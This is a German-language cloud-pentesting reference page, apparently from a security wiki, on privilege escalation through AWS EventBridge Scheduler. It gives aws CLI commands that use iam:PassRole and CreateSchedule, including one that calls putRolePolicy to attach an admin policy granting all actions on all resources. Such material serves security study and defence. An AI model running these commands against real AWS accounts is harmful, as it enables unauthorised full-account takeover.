AWS - EventBridge Scheduler Privesc

EventBridge Scheduler

Weitere Informationen zum EventBridge Scheduler in:

iam:PassRole, (scheduler:CreateSchedule | scheduler:UpdateSchedule)

Ein Angreifer mit diesen Berechtigungen wird in der Lage sein, einen Scheduler zu erstellen|zu aktualisieren und die Berechtigungen der an ihn angehängten Scheduler-Rolle auszunutzen, um jede Aktion auszuführen.

Zum Beispiel könnten sie den Zeitplan so konfigurieren, dass er eine Lambda-Funktion aufruft, was eine vorgegebene Aktion ist:

aws scheduler create-schedule \
--name MyLambdaSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:lambda:<region>:<account-id>:function:<LambdaFunctionName>",
"RoleArn": "arn:aws:iam::<account-id>:role/<RoleName>"
}'

Zusätzlich zu den vorgefertigten Dienstaktionen können Sie universelle Ziele im EventBridge Scheduler verwenden, um eine Vielzahl von API-Operationen für viele AWS-Dienste aufzurufen. Universelle Ziele bieten die Flexibilität, fast jede API aufzurufen. Ein Beispiel kann die Verwendung universeller Ziele sein, um "AdminAccessPolicy" hinzuzufügen, indem eine Rolle verwendet wird, die die "putRolePolicy"-Richtlinie hat:

aws scheduler create-schedule \
--name GrantAdminToTargetRoleSchedule \
--schedule-expression "rate(5 minutes)" \
--flexible-time-window "Mode=OFF" \
--target '{
"Arn": "arn:aws:scheduler:::aws-sdk:iam:putRolePolicy",
"RoleArn": "arn:aws:iam::<account-id>:role/RoleWithPutPolicy",
"Input": "{\"RoleName\": \"TargetRole\", \"PolicyName\": \"AdminAccessPolicy\", \"PolicyDocument\": \"{\\\"Version\\\": \\\"2012-10-17\\\", \\\"Statement\\\": [{\\\"Effect\\\": \\\"Allow\\\", \\\"Action\\\": \\\"*\\\", \\\"Resource\\\": \\\"*\\\"}]}\"}"
}'

Referenzen

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-templated.html

• https://docs.aws.amazon.com/scheduler/latest/UserGuide/managing-targets-universal.html